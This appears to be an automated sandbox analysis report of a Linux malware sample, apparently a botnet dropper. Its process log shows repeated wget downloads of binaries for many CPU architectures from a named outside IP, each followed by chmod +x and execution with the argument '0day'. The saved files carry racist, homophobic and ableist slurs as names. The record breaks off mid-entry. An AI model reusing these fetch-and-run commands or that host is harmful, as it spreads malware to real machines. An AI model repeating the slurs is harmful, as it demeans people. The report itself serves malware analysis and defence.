                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  General

                                                                  Start time (UTC):09:40:19
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/lol
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O lmao http://94.156.8.244/mpsl
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:19
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:19
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x lmao
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:19
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:19
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:19
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O faggot http://94.156.8.244/x86_64
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:21
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:21
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x faggot
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:21
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:21
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:21
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O gay http://94.156.8.244/arm
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:22
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:22
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x gay
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:22
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:22
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/gay
                                                                  Arguments:./gay 0day
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:22
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:22
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O retard http://94.156.8.244/arm5
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:24
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:24
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x retard
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:24
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:24
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:./retard 0day
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:30
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:30
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:37
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:37
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:37
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:39
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:40
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:40
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:40
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:41
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:45
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:45
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:50
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:50
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:55
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:55
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:00
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:00
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:05
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:05
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:08
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:15
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:15
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:20
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:23
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:25
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:30
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:35
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:40
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:40
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:45
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:53
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:53
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:41:53
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:00
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:05
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:08
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:15
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:15
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:20
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:20
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:25
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:25
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:35
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:45
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:42:45
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:30
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:30
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:31
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:32
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:34
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:35
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:36
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/retard
                                                                  Arguments:-
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                  General

                                                                  Start time (UTC):09:40:30
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:30
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O nigger http://94.156.8.244/arm6
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:32
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:32
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x nigger
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:32
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:32
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:32
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O shit http://94.156.8.244/arm7
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:33
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:33
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x shit
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:33
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:33
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:33
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O nigga http://94.156.8.244/i586
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:35
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:35
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x nigga
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:35
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:35
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:35
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O kekw http://94.156.8.244/i686
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:35
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:35
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x kekw
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:36
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:36
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:36
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O what http://94.156.8.244/powerpc
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x what
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O kys http://94.156.8.244/sh4
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x kys
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:38
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:39
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:39
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
